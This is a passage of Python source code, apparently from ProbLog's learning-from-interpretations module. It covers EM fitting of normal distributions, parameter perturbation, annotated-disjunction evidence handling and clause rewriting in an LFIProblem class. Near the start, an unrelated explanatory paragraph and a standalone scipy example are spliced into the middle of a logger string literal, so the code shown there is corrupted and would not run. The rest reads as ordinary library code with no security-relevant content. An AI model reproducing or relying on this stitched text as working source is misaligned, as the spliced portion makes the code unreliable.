getLogger(\"problog_lfi\")\n logger.debug(\n \"Encountered a singular covariance matrix: 
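The multivariate branch of dist_prob below receives the covariance as a row-based flat list and reshapes it before handing it to scipy; the same call in isolation, with invented parameters:

import numpy as np
import scipy.stats as stats

# The covariance arrives as a flat row-major list:
# [10, 1, 1, 10] means [[10, 1], [1, 10]].
m = [1.0, 1.0]
cov = np.reshape([10.0, 1.0, 1.0, 10.0], (2, 2))
rv = stats.multivariate_normal(m, cov)
print(rv.pdf([10.0, 11.0]))   # a density, not a probability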
N({},\\n{})\".format(\n m, cov\n )\n )\n raise exc\n if log:\n raise NotImplementedError(\"log computations not yet supported\")\n else:\n result = [0, rv.pdf(x)]\n retval = DensityValue(result)\n else: # univariate\n m, s = map(float, d.args)\n rv = stats.norm(m, s)\n # TODO: The multiplication with eps should be avoided by working with densities\n result = rv.pdf(x)\n if log:\n try:\n result = math.log(result)\n except ValueError:\n result = -math.inf\n # # print('dist_prob({}, {}) -> {}'.format(d, x, result))\n retval = DensityValue([0, result])\n\n if density:\n return retval\n else:\n return float(retval)\n raise ValueError(\"Distribution not supported '%s'\" % d.functor)\n\n\ndef dist_prob_set(d, values, eps=1e-4):\n \"\"\"Fit parameters based on EM.\n :param d: Distribution Term\n :param values: List of (value, weight, count)\n \"\"\"\n logger = getLogger(\"problog_lfi\")\n if stats is None or np is None:\n raise ProbLogError(\n \"Continuous variables require Scipy and Numpy to be installed.\"\n )\n if d.functor == \"normal\":\n if isinstance(d.args[0], Term) and d.args[0].functor == \".\":\n args = (term2list(d.args[0]), term2list(d.args[1]))\n else:\n args = d.args\n if isinstance(args[0], list): # multivariate\n # TODO: cleanup (make nice with numpy, store numpy in Term to avoid conversions?)\n pf = 0.0\n ndim = len(args[0])\n mu = np.zeros(ndim)\n cov = np.zeros((ndim, ndim))\n for value, weight, count in values:\n weight = float(weight)\n pf += weight * count\n mu += weight * count * np.array(value)\n if pf == 0.0:\n # Reuse previous distribution, no samples found\n return d\n mu /= pf\n for value, weight, count in values:\n weight = float(weight)\n xmu = np.matrix(value) - mu\n cov += weight * count * xmu.T * xmu\n cov /= pf\n s_eps = eps ** 2\n # if np.linalg.matrix_rank(cov) != ndim:\n # # The matrix is singular, reinitialise to random value\n # # See Bishop 9.2.1 on singularities in GMM. Better solutions exist.\n # logger.debug('Singular matrix, reset to random values')\n # mu = np.random.random(ndim)\n # cov = np.diagflat([1000.0]*ndim)\n # for i in range(cov.shape[0]):\n # if cov[i, i] < s_eps:\n # # Covariance is corrected to not have probabilities larger than 1\n # # Pdf is multiplied with eps to translate to prob\n # logger.debug('Corrected covar from {} to {}'.format(cov[i, i], s_eps))\n # cov[i, i] = s_eps\n try:\n rv = stats.multivariate_normal(mu, cov)\n if rv.pdf(mu) > 1.0 / (2 * eps):\n logger.debug(\"PDF larger than 1.0/(2*eps), assume singularity\")\n raise np.linalg.linalg.LinAlgError()\n except np.linalg.linalg.LinAlgError:\n logger.debug(\"Singular matrix for normal dist, reset to random values\")\n logger.debug(\"mu = {}\".format(mu))\n logger.debug(\"cov = \\n{}\".format(cov))\n # The matrix is singular, reinitialise to random value\n # See Bishop 9.2.1 on singularities in GMM. 
Better solutions exist.\n mu = np.random.random(ndim)\n cov = np.diagflat([1000.0] * ndim)\n cov = cov.reshape(-1)\n # # print('Update: {} -> normal({},{})'.format(d, mu, cov))\n # values.sort(key=lambda t: t[0])\n # for value, weight, count in values:\n # # print('({:<4}, {:7.5f}, {:<4})'.format(value, weight, count))\n return d.with_args(list2term(mu.tolist()), list2term(cov.tolist()))\n else: # univariate\n pf = 0.0\n mu = 0.0\n var = 0.0\n for value, weight, count in values:\n weight = float(weight)\n pf += weight * count\n mu += weight * count * value\n if pf == 0.0:\n # Reuse previous distribution, no samples found\n return d\n mu /= pf\n for value, weight, count in values:\n weight = float(weight)\n var += weight * count * (value - mu) ** 2\n var /= pf\n if var < eps ** 2:\n # TODO: Is this a good approach? Should also take singularity into account\n # Std is corrected to not have probabilities larger than 1\n # Pdf is multiplied with eps to translate to prob\n std = eps\n logger.debug(\"Corrected std to {}\".format(std))\n else:\n std = math.sqrt(\n var\n ) # TODO: should we make this also variance to be consistent with multivariate?\n # # print('Update: {} -> normal({},{})'.format(d, mu, std))\n # values.sort(key=lambda t: t[0])\n # for value, weight, count in values:\n # # print('({:<4}, {:7.5f}, {:<4})'.format(value, weight, count))\n return d.with_args(Constant(mu), Constant(std))\n raise ValueError(\"Distribution not supported '%s'\" % d.functor)\n\n\ndef dist_perturb(d):\n if stats is None or np is None:\n raise ProbLogError(\n \"Continuous variables require Scipy and Numpy to be installed.\"\n )\n if d.functor == \"normal\":\n if isinstance(d.args[0], Term) and d.args[0].functor == \".\":\n args = (term2list(d.args[0]), term2list(d.args[1]))\n else:\n args = d.args\n if isinstance(args[0], list): # multivariate\n mu = args[0] # type: List[float]\n ndim = len(mu)\n cov = args[1] # type: List[float]\n if len(cov) != ndim * ndim:\n raise ValueError(\"Distribution parameters do not match: {}\".format(d))\n rv = stats.multivariate_normal(mu, np.reshape(cov, (ndim, ndim)) / 10)\n mu = rv.rvs()\n dn = d.with_args(list2term(mu.tolist()), list2term(cov))\n return dn\n else: # univariate\n mu, std = map(float, d.args)\n rv = stats.norm(mu, std / 10)\n mu = float(rv.rvs())\n dn = d.with_args(Constant(mu), Constant(std))\n return dn\n raise ValueError(\"Distribution not supported '%s'\" % d.functor)\n\n\nclass LFIProblem(LogicProgram):\n def __init__(\n self,\n source,\n examples,\n max_iter=10000,\n min_improv=1e-10,\n verbose=0,\n knowledge=None,\n leakprob=None,\n propagate_evidence=True,\n normalize=False,\n log=False,\n eps=1e-4,\n **extra\n ):\n \"\"\"\n Learn parameters using LFI.\n The atoms with to be learned continuous distributions can only appear in the head of a rule.\n :param source: filename of file containing input model\n :type source: str\n :param examples: list of observed terms / value\n :type examples: list[tuple(Term, bool)]\n :param max_iter: maximum number of iterations to run\n :type max_iter: int\n :param min_improv: minimum improvement in log-likelihood for convergence detection\n :type min_improv: float\n :param verbose: verbosity level\n :type verbose: int\n :param knowledge: class to use for knowledge compilation\n :type knowledge: class\n :param leakprob: Add all true evidence atoms with the given probability\n to avoid 'inconsistent evidence' errors. 
This also\n allows to learn a program without constants and\n retrieve the constants from the evidence file.\n (default: None)\n :type leakprob: float or None\n :param eps: Epsilon value which is the smallest value that is used\n :type eps: float\n :param extra: catch all for additional parameters (not used)\n \"\"\"\n # logger = getLogger('problog_lfi')\n LogicProgram.__init__(self)\n self.source = source\n self._log = log\n self._eps = eps\n\n # The names of the atom for which we want to learn weights.\n self.names = []\n self.bodies = []\n self.parents = []\n\n # The weights to learn.\n # The initial weights are of type 'float'.\n # When necessary they are replaced by a dictionary [t(arg1, arg2, ...) -> float]\n # for weights of form t(SV, arg1, arg2, ...).\n self._weights = []\n\n self.examples = examples\n self.leakprob = leakprob\n self.leakprobatoms = None\n self.propagate_evidence = propagate_evidence\n self._compiled_examples = None\n\n self.max_iter = max_iter\n self.min_improv = min_improv\n self.verbose = verbose\n self.iteration = 0\n\n if knowledge is None:\n knowledge = get_evaluatable()\n self.knowledge = knowledge\n\n self.output_mode = False\n self.extra = extra\n\n self._enable_normalize = normalize\n self._adatoms = [] # list AD atoms and total probability\n self._adatomc = {} # complement of AD atom (complement that adds to prob 1.0)\n self._adparent = {} # atom representing parent of AD\n self._catoms = set() # Continuous atoms\n\n @property\n def count(self):\n \"\"\"Number of parameters to learn.\"\"\"\n return len(self.names)\n\n def add_ad(self, rem_prob, indices):\n \"\"\"\n :param rem_prob: Remaining probability that can be learned (if no fixed probabilities given, this will be one)\n :param indices: Indices of atoms that together form an annotated disjunction.\n :return: None\n \"\"\"\n self._adatoms.append((rem_prob, indices))\n for idx in indices:\n self._adatomc[idx] = [idxo for idxo in indices if idxo != idx]\n\n def count_ad(self):\n return len(self._adatoms)\n\n def append_ad(self, atom_index, ad_index=None):\n if ad_index is None:\n ad_index = -1\n self._adatoms[ad_index][1].append(atom_index)\n indices = self._adatoms[ad_index][1]\n for idx in indices:\n self._adatomc[idx] = [idxo for idxo in indices if idxo != idx]\n\n def verify_ad(self, ad_index=None):\n if ad_index is None:\n ad_index = -1\n if len(self._adatoms[ad_index][1]) == 1:\n indices = self._adatoms[ad_index][1]\n\n self._adatomc[indices[0]] = [\n -1 - indices[0]\n ] # No AD, complement is negative variable\n\n def prepare(self):\n \"\"\"Prepare for learning.\"\"\"\n self._compile_examples()\n\n def _get_weight(self, index, args, strict=True):\n index = int(index)\n weight = self._weights[index]\n if isinstance(weight, dict):\n if strict:\n return weight[args]\n else:\n return weight.get(args, 0.0)\n else:\n return weight\n\n def get_weights(self, index):\n \"\"\"Get a list of key, weight pairs for the given input fact.\n :param index: identifier of the fact\n :return: list of key, weight pairs where key refers to the additional variables\n on which the weight is based\n :rtype: list[tuple[Term, float]]\n \"\"\"\n weight = self._weights[index]\n if isinstance(weight, dict):\n return list(weight.items())\n else:\n return [(Term(\"t\"), weight)]\n\n def _set_weight(self, index, args, weight, weight_changed=None):\n # # print(self._weights)\n index = int(index)\n if not args:\n assert not isinstance(self._weights[index], dict)\n self._weights[index] = weight\n elif 
isinstance(self._weights[index], dict):\n # self._weights[index][args] = weight\n if weight_changed and weight_changed[index]:\n self._weights[index][Term(args.functor)] += weight\n else:\n self._weights[index][Term(args.functor)] = weight\n else:\n if index in self._catoms:\n # If new t args, perturb the distribution a bit to avoid identical ones\n weight = dist_perturb(weight)\n # TODO: Shouldn't all weights be perturbed to avoid identical updates?\n # self._weights[index] = {args: weight}\n self._weights[index] = {Term(args.functor): weight}\n # print(\"Weights\", self._weights)\n\n def _add_weight(self, weight):\n self._weights.append(weight)\n\n def _process_examples(self):\n \"\"\"Process examples by grouping together examples with similar structure.\n :return: example groups based on evidence atoms\n :rtype: dict of atoms : values for examples\n \"\"\"\n\n # value can be True / False / None\n # ( atom ), ( ( value, ... ), ... )\n\n # Simple implementation: don't add neutral evidence.\n\n # ad_groups is a dictionary of lists, each list contains an AD\n # the key\n ad_groups = list()\n for ad in self._adatoms:\n # if it's an AD group AND the total probability is 1.0\n if len(ad[1]) > 1 and ad[0] == 1.0:\n ad_list = []\n for var in ad[1]:\n ad_list.append(Term(self.names[var].functor, *self.names[var].args))\n ad_groups.append(tuple(ad_list))\n # print(\"AD Groups\\t\\t:\", ad_groups)\n\n def multiple_true(d):\n \"\"\"\n This function recognizes inconsistent evidence s.t. more than one term is True in AD.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :return: whether more than one value is True\n \"\"\"\n true_count = sum(v is True for v in d.values())\n return true_count > 1\n\n def all_false(d):\n \"\"\"\n This function recognizes inconsistent evidence s.t. 
all values are False in AD.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :return: whether all values are False\n \"\"\"\n # false_count should be the same as the length of d\n false_count = sum(v is False for v in d.values())\n return false_count == len(d)\n\n def all_false_except_one(d):\n \"\"\"\n This function recognizes incomplete evidence s.t.\n the non-False value in AD needs to be set to True.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :return: whether all values except one are False\n \"\"\"\n false_count = sum(v is False for v in d.values())\n the_left_is_none = bool(sum(v is None for v in d.values()))\n return (false_count == len(d) - 1) and the_left_is_none\n\n def getADtemplate(d, atom=None):\n \"\"\"\n This function gets atom's complement AD template.\n This should only be used when the AD contains non-ground terms.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :param atom: an evidence\n :return: atom's complement AD template\n \"\"\"\n if atom is not None:\n temp_dict = {\n k: v\n for k, v in d.items()\n if v == \"Template\" and atom.signature != k.signature\n }\n return temp_dict\n else:\n temp_dict = {k: v for k, v in d.items() if v == \"Template\"}\n return temp_dict\n\n def add_to_ad_evidence(pair, l, ADtemplate):\n \"\"\"\n :param pair: a new pair of (atom, value)\n :param l: a list of dictionaries, all dictionaries need to have the same format\n :return:\n \"\"\"\n (k, v) = pair\n # if entry k exists, update the value with k\n for d in l:\n if k in d:\n d[k] = v\n return\n # if entry k does not exist, create a new dictionary from template\n # and instantiate it with k\n new_d = dict()\n for temp_k in ADtemplate.keys():\n new_key = Term(temp_k.functor, *k.args)\n new_d[new_key] = None\n # put v in there\n new_d[k] = v\n l.append(new_d)\n\n if self.propagate_evidence:\n result = ExampleSet()\n inconsistent = False\n # iterate over all examples given in .ev\n for index, example in enumerate(self.examples):\n ad_evidences = []\n non_ad_evidence = {}\n for ad_group in ad_groups:\n # create a dictionary to memorize what evidence is given in AD\n d = dict()\n # TODO: what if the AD contains both ground and non-ground????\n # e.g. 
t(_)::a; t(_)::b(X)\n for var in ad_group:\n if var.is_ground():\n d[var] = None # for ground unknown evidence\n else:\n d[var] = \"Template\" # for unground unknown evidence\n ad_evidences.append(d)\n\n # add all evidence in the example to ad_evidences\n for atom, value, cvalue in example:\n # if atom has a tunable probability to learn\n if any([atom.signature == name.signature for name in self.names]):\n # Propositional evidence\n if len(atom.args) == 0:\n # insert evidence\n for d in ad_evidences:\n if atom in d:\n d[atom] = value\n non_ad_evidence[\n atom\n ] = value # TODO: what does this capture?\n # First Order evidence\n else:\n # find the right AD dictionary : AD_dict\n AD_dict = None\n for d in ad_evidences:\n if any([atom.signature == k.signature for k in d]):\n AD_dict = d\n # if the instantiation is new, add it as a key to the dictionary\n if AD_dict and AD_dict.get(atom) is None:\n AD_dict[atom] = value\n # also add other AD parts in the dictionary with value==None\n other_ADs = getADtemplate(AD_dict, atom)\n for otherAD in other_ADs.keys():\n new_key = Term(otherAD.functor, *atom.args)\n AD_dict[new_key] = AD_dict.get(new_key, None)\n else:\n non_ad_evidence[atom] = value\n else:\n non_ad_evidence[atom] = value\n\n # grounded_ad_evidences contains all usable evidence (ground, not template)\n grounded_ad_evidences = []\n for d in ad_evidences:\n # for first order evidence dictionaries\n if \"Template\" in d.values():\n # new_ad_evidence is a list of dictionaries\n # each dictionary is a group of the AD template instantiation\n new_ad_evidence = list()\n # get template AD evidence\n ADtemplate = getADtemplate(d)\n # group all pairs according to ADtemplate\n for k, v in d.items():\n if v != \"Template\":\n add_to_ad_evidence((k, v), new_ad_evidence, ADtemplate)\n grounded_ad_evidences += new_ad_evidence\n # for propositional evidence dictionaries\n else:\n # simply use them\n grounded_ad_evidences.append(d)\n\n # # print(grounded_ad_evidences)\n\n inconsistent_example = False\n for i, d in enumerate(grounded_ad_evidences):\n # inconsistent1 = multiple_true(d)\n inconsistent2 = all_false(d)\n add_compliment = all_false_except_one(d)\n\n if inconsistent2:\n # print(\"*** Warning: Inconsistent Evidence Detected! Ignoring this datapoint. 
***\\n\")\n inconsistent_example = True\n continue\n elif add_compliment:\n for key, value in d.items():\n if value is None:\n grounded_ad_evidences[i][key] = True\n\n if not inconsistent_example and len(grounded_ad_evidences) > 0:\n # There are (fully tunable) ADs in the program\n evidence_set = set()\n for d in grounded_ad_evidences:\n for key, value in d.items():\n if value is not None:\n evidence_set.add((key, value, None))\n\n for key, value in non_ad_evidence.items():\n evidence_set.add((key, value, None))\n\n atoms, values, cvalues = zip(*evidence_set)\n # print(index, \"Push evidence\\t:\", atoms, values, cvalues, \"\\n\")\n result.add(index, atoms, values, cvalues)\n\n else:\n # (No AD case) or (Inconsistent Evidence Case)\n atoms, values, cvalues = zip(*example)\n # print(index, \"Push evidence\\t:\", atoms, values, \"\\n\")\n result.add(index, atoms, values, cvalues)\n\n return result\n else:\n # smarter: compile-once all examples with same atoms\n result = ExampleSet()\n for index, example in enumerate(self.examples):\n atoms, values, cvalues = zip(*example)\n result.add(index, atoms, values, cvalues)\n return result\n\n def _compile_examples(self):\n \"\"\"Compile examples.\"\"\"\n baseprogram = DefaultEngine(**self.extra).prepare(self)\n # print(\"\\nBase Program\\t:\")\n # print(\"\\t\" + baseprogram.to_prolog().replace(\"\\n\", \"\\n\\t\"))\n examples = self._process_examples()\n # print()\n for i, example in enumerate(examples):\n # print(\"Compiling example {}/{}\".format(i + 1, len(examples)))\n example.compile(self, baseprogram)\n self._compiled_examples = examples\n\n def _process_atom(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n result = None\n if isinstance(atom, Or):\n # Annotated disjuntions are always discrete distributions\n result = self._process_atom_discr(atom, body)\n if (\n result is None\n and atom.probability\n and isinstance(atom.probability, Term)\n and len(atom.probability.args) > 0\n ):\n cdist = atom.probability.args[0]\n if isinstance(cdist, Term) and not isinstance(cdist, Var):\n if cdist.functor in cdist_names:\n result = self._process_atom_cont(atom, body)\n if result is None:\n result = self._process_atom_discr(atom, body)\n # print(str(atom) + \" got processed to \" + str(result))\n return result\n\n def _process_atom_cont(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n logger = getLogger(\"problog_lfi\")\n atoms_out = []\n extra_clauses = []\n\n has_lfi_fact = False\n\n if atom.probability and atom.probability.functor == \"t\":\n has_lfi_fact = True\n cdist = atom.probability.args[0]\n if isinstance(cdist, Term) and cdist.functor in cdist_names:\n start_dist = cdist\n if cdist.functor == \"normal\":\n start_params = [None, None]\n try:\n if cdist.args[0].functor == \".\":\n start_params[0] = term2list(cdist.args[0]) # multivariate\n else:\n start_params[0] = float(cdist.args[0]) # univariate\n except InstantiationError:\n start_params[0] = None\n except ArithmeticError:\n start_params[0] = None\n try:\n if cdist.args[1].functor == \".\":\n start_params[1] = term2list(cdist.args[1]) # multivariate\n else:\n start_params[1] = float(cdist.args[1]) # univariate\n except InstantiationError:\n start_params[1] = None\n except ArithmeticError:\n start_params[1] = None\n else:\n start_params = None\n else:\n start_dist = None\n start_params = None\n\n # Learnable probability\n # # print('get start_value from {}'.format(cdist))\n\n # Replace anonymous variables with 
non-anonymous variables.\n class ReplaceAnon(object):\n def __init__(self):\n self.cnt = 0\n\n def __getitem__(self, key):\n if key == \"_\":\n self.cnt += 1\n return Var(\"anon_%s\" % self.cnt)\n else:\n return Var(key)\n\n atom1 = atom.apply(ReplaceAnon())\n prob_args = atom.probability.args[1:]\n\n # 1) Introduce a new fact\n # lfi_fact(0, t(1), 2, 3)\n # | | |\n # | | `-> Arguments for atom in head\n # | `-> Arguments for prob in head in t(_, 1)\n # `-> Identifier for original to learn term\n # TODO: naming it clfi_fact instead of lfi_fact is not really necessary\n lfi_fact = Term(\n \"clfi_fact\", Constant(self.count), Term(\"t\", *prob_args), *atom1.args\n )\n lfi_prob = Term(\n \"clfi\",\n Constant(self.count),\n Term(\"t\", *prob_args),\n atom.with_probability(),\n )\n\n # 2) Replacement atom\n replacement = lfi_fact.with_probability(lfi_prob)\n if body is None:\n new_body = lfi_fact\n else:\n new_body = body & lfi_fact\n\n # 3) Create redirection clause\n extra_clauses += [Clause(atom1.with_probability(), new_body)]\n\n # 4) Set initial weight\n if start_dist is None:\n raise ProbLogError(\"No correct initial distribution defined\")\n elif start_dist.functor == \"normal\":\n if start_params[0] is None:\n start_params[0] = Constant(random.gauss(0, 10))\n if start_params[1] is None:\n start_params[1] = Constant(\n 1000000\n ) # TODO: What is a good choice here?\n start_dist = start_dist.with_args(start_params[0], start_params[1])\n self._add_weight(start_dist)\n\n # 5) Add name\n self._catoms.add(len(self.names))\n self.names.append(atom)\n atoms_out.append(replacement)\n else:\n # TODO: process continuous distributions that do not need to be learned\n atoms_out.append(atom)\n raise ProbLogError(\n \"Continuous distributions that do not need to be learned are not yet supported.\"\n )\n\n if has_lfi_fact:\n result = [atoms_out[0]] + extra_clauses\n else:\n if body is None:\n result = [atoms_out[0]]\n else:\n result = [Clause(atoms_out[0], body)]\n logger.debug(\"New clauses: \" + str(result))\n return result\n\n def _process_atom_discr(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n if isinstance(atom, Or):\n # Annotated disjunction\n atoms = atom.to_list()\n else:\n atoms = [atom]\n\n atoms_out = []\n extra_clauses = []\n\n has_lfi_fact = False\n prior_probability = 0.0 # Sum of prior weights in AD.\n fixed_probability = 0.0 # Sum of fixed (i.e. 
non-learnable) weights in AD.\n\n num_random_weights = 0\n for atom in atoms:\n if atom.probability and atom.probability.functor == \"t\":\n try:\n start_value = float(atom.probability.args[0])\n prior_probability += float(start_value)\n except InstantiationError:\n # Can't be converted to float => take random\n num_random_weights += 1\n except ArithmeticError:\n num_random_weights += 1\n elif atom.probability and atom.probability.is_constant():\n fixed_probability += float(atom.probability)\n\n random_weights = [random.random() for i in range(0, num_random_weights + 1)]\n norm_factor = (1.0 - prior_probability - fixed_probability) / sum(\n random_weights\n )\n random_weights = [r * norm_factor for r in random_weights]\n\n # First argument is probability available for learnable weights in the AD.\n self.add_ad(1.0 - fixed_probability, []) # TODO : this adds extra ad\n\n for atom in atoms:\n if atom.probability and atom.probability.functor == \"t\":\n # t(_)::p(X) :- body.\n #\n # Translate to\n # lfi(1)::lfi_fact_1(X).\n # p(X) :- lfi_body_1(X).\n # lfi_body_1(X) :- body, lfi_fact_1(X).\n # lfi_body_2(X) :- body, \\+lfi_fact_1(X).\n #\n # For annotated disjunction: t(_)::p1(X); t(_)::p2(X) :- body.\n # lfi1::lfi_fact_1(X); lfi2::lfi_fact_2(X); ... .\n # p1(X) :- lfi_body_1(X).\n # lfi_body_1(X) :- body, lfi_fact_1(X).\n # p2(X) :- lfi_body_2(X).\n # lfi_body_2(X) :- body, lfi_fact_2(X).\n # ....\n has_lfi_fact = True\n\n # Learnable probability\n try:\n start_value = float(atom.probability.args[0])\n except InstantiationError:\n start_value = None\n except ArithmeticError:\n start_value = None\n\n # Replace anonymous variables with non-anonymous variables.\n class ReplaceAnon(object): # TODO: can be defined outside of for loop?\n def __init__(self):\n self.cnt = 0\n\n def __getitem__(self, key):\n if key == \"_\":\n self.cnt += 1\n return Var(\"anon_%s\" % self.cnt)\n else:\n return Var(key)\n\n atom1 = atom.apply(ReplaceAnon())\n prob_args = atom.probability.args[1:]\n\n # 1) Introduce a new fact\n # lfi_fact = Term('lfi_fact', Constant(self.count), Term('t', *prob_args), *atom1.args)\n # lfi_body = Term('lfi_body', Constant(self.count), Term('t', *prob_args), *atom1.args)\n lfi_fact = Term(\n \"lfi_fact\", Constant(self.count), Term(\"t\", *prob_args, *atom1.args)\n )\n lfi_body = Term(\n \"lfi_body\", Constant(self.count), Term(\"t\", *prob_args, *atom1.args)\n )\n # lfi_par = Term('lfi_par', Constant(self.count_ad()), Term('t', *prob_args), *atom1.args)\n # TODO: lfi_par should be unique for rule, not per disjunct\n # lfi_par = Term('lfi_par', Constant(self.count), Term('t', *prob_args), *atom1.args)\n lfi_par = Term(\n \"lfi_par\", Constant(self.count), Term(\"t\", *prob_args, *atom1.args)\n )\n # lfi_prob = Term('lfi', Constant(self.count), Term('t', *prob_args, *atom1.args))\n lfi_prob = Term(\"lfi\", Constant(self.count), Term(\"t\"))\n\n # 2) Replacement atom\n replacement = lfi_fact.with_probability(lfi_prob)\n\n if body is None:\n new_body = Term(\"true\")\n else:\n new_body = body\n\n # 3) Create redirection clause\n\n extra_clauses += [\n Clause(atom1.with_probability(), lfi_body),\n Clause(lfi_body, lfi_par & lfi_fact),\n Clause(lfi_par, new_body),\n ]\n\n self.append_ad(len(self._weights))\n # 4) Set initial weight\n if start_value is None:\n start_value = random_weights.pop(-1)\n self._add_weight(start_value)\n else:\n self._add_weight(start_value)\n\n # 5) Add name\n self.names.append(atom)\n self.bodies.append(lfi_body)\n self.parents.append(lfi_par)\n 
atoms_out.append(replacement)\n else:\n atoms_out.append(atom)\n\n self.verify_ad()\n\n if has_lfi_fact:\n if len(atoms) == 1: # Simple clause\n return [atoms_out[0]] + extra_clauses\n else:\n return [AnnotatedDisjunction(atoms_out, Term(\"true\"))] + extra_clauses\n else:\n if len(atoms) == 1:\n if body is None:\n return [atoms_out[0]]\n else:\n return [Clause(atoms_out[0], body)]\n else:\n if body is None:\n body = Term(\"true\")\n return [AnnotatedDisjunction(atoms_out, body)]\n\n def _process_atom_output(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n\n if isinstance(atom, Or):\n atoms = atom.to_list()\n else:\n atoms = [atom]\n\n transforms = defaultdict(list)\n\n clauses = []\n atoms_fixed = []\n t_args = None\n fixed_only = True\n for atom in atoms:\n if atom.probability and atom.probability.functor == \"t\":\n assert atom in self.names\n # assert (t_args is None or atom.probability.args == t_args)\n # t_args = atom.probability.args\n\n index = self.output_names.index(atom)\n weights = self.get_weights(index)\n\n for w_args, w_val in weights:\n translate = tuple(zip(atom.probability.args[1:], w_args.args))\n if isinstance(w_val, Term) and w_val.functor in cdist_names:\n # Keep the complex structure that represents the distribution\n transforms[translate].append(atom.with_probability(w_val))\n else:\n transforms[translate].append(\n atom.with_probability(Constant(w_val))\n )\n self.output_names[index] = None\n fixed_only = False\n else:\n atoms_fixed.append(atom)\n\n if not fixed_only:\n clauses = []\n for tr, atoms in transforms.items():\n tr = DefaultDict({k: v for k, v in tr})\n atoms_out = [at.apply(tr) for at in atoms] + atoms_fixed\n if len(atoms_out) == 1:\n if body is None:\n clauses.append(atoms_out[0])\n else:\n clauses.append(Clause(atoms_out[0], body.apply(tr)))\n else:\n if body is None:\n clauses.append(AnnotatedDisjunction(atoms_out, None))\n else:\n clauses.append(AnnotatedDisjunction(atoms_out, body.apply(tr)))\n return clauses\n else:\n atoms_out = atoms_fixed\n if len(atoms_out) == 1:\n if body is None:\n return [atoms_out[0]]\n else:\n return [Clause(atoms_out[0], body)]\n else:\n return [AnnotatedDisjunction(atoms_out, body)]\n\n # Overwrite from LogicProgram\n def __iter__(self):\n \"\"\"\n Iterate over the clauses of the source model.\n This object can be used as a LogicProgram to be passed to the grounding Engine.\n Extracts and processes all ``t(...)`` weights.\n This\n * replaces each probabilistic atom ``t(...)::p(X)`` by a unique atom \\\n ``lfi(i) :: lfi_fact_i(X)``;\n * adds a new clause ``p(X) :- lfi_fact_i(X)``;\n * adds a new query ``query( lfi_fact_i(X) )``;\n * initializes the weight of ``lfi(i)`` based on the ``t(...)`` specification;\n This also removes all existing queries from the model.\n Example:\n .. code-block:: prolog\n t(_) :: p(X) :- b(X).\n t(_) :: p(X) :- c(X).\n is transformed into\n .. 
code-block:: prolog\n lfi(0) :: lfi_fact_0(X) :- b(X).\n p(X) :- lfi_fact_0(X).\n lfi(1) :: lfi_fact_1(X) :- c(X).\n p(X) :- lfi_fact_1(X).\n query(lfi_fact_0(X)).\n query(lfi_fact_1(X)).\n If ``self.leakprobs`` is a value, then during learning all true\n examples are added to the program with the given leak probability.\n \"\"\"\n\n if self.output_mode:\n process_atom = self._process_atom_output\n self.output_names = self.names[:]\n else:\n process_atom = self._process_atom\n\n for clause in self.source:\n if isinstance(clause, Clause):\n if clause.head.functor == \"query\" and clause.head.arity == 1:\n continue\n extra_clauses = process_atom(clause.head, clause.body)\n for extra in extra_clauses:\n # print(\"RULE >>\", extra)\n yield extra\n elif isinstance(clause, AnnotatedDisjunction):\n extra_clauses = process_atom(Or.from_list(clause.heads), clause.body)\n for extra in extra_clauses:\n # print(\"RULE >>\", extra)\n yield extra\n else:\n if clause.functor == \"query\" and clause.arity == 1:\n continue\n # Fact\n extra_clauses = process_atom(clause, None)\n for extra in extra_clauses:\n # print(\"RULE >>\", extra)\n yield extra\n\n if self.leakprob is not None:\n leakprob_atoms = self._get_leakprobatoms()\n for example_atom in leakprob_atoms:\n yield example_atom.with_probability(Constant(self.leakprob))\n\n def _get_leakprobatoms(self):\n if self.leakprobatoms is not None:\n return self.leakprobatoms\n self.leakprobatoms = set()\n for examples in self.examples:\n for example, obs in examples:\n if obs:\n self.leakprobatoms.add(example)\n return self.leakprobatoms\n\n def _evaluate_examples(self):\n \"\"\"Evaluate the model with its current estimates for all examples.\"\"\"\n results = []\n i = 0\n getLogger(\"problog_lfi\").debug(\"Evaluating examples ...\")\n\n if self._log:\n evaluator = ExampleEvaluatorLog(self._weights, eps=self._eps)\n else:\n evaluator = ExampleEvaluator(self._weights, eps=self._eps)\n\n results = []\n for i, example in enumerate(self._compiled_examples):\n try:\n results.append(evaluator(example))\n except InconsistentEvidenceError:\n # print(\"Ignoring example {}/{}\".format(i + 1, len(self._compiled_examples)))\n getLogger(\"problog_lfi\").warning(\n \"Ignoring example {}/{}\".format(i + 1, len(self._compiled_examples))\n )\n # for result in results:\n # # print(result)\n\n return list(chain.from_iterable(results))\n\n # return list(chain.from_iterable(map(evaluator, self._compiled_examples)))\n\n def _update(self, results):\n \"\"\"Update the current estimates based on the latest evaluation results.\"\"\"\n # print(\"_update\", results)\n logger = getLogger(\"problog_lfi\")\n # fact_marg = defaultdict(DensityValue)\n fact_marg = defaultdict(int)\n fact_body = defaultdict(int)\n fact_par = defaultdict(int)\n fact_count = defaultdict(int)\n fact_values = dict()\n score = 0.0\n for m, pEvidence, result, p_values in results:\n # if not isinstance(pEvidence, DensityValue):\n # pEvidence = DensityValue.wrap(pEvidence)\n # print(\"_update.result\", result)\n par_marg = dict()\n # # print('p_values', p_values)\n for fact, value in result.items():\n # print(fact, value)\n index = fact.args[0:2]\n # if not index in fact_marg:\n # fact_marg[index] = polynomial.polynomial.polyzero\n # if not isinstance(value, DensityValue):\n # value = DensityValue.wrap(value)\n if fact.functor == \"lfi_fact\":\n fact_marg[index] += value * m\n if fact.functor == \"lfi_body\":\n fact_body[index] += value * m\n elif fact.functor == \"lfi_par\":\n if index in par_marg:\n if 
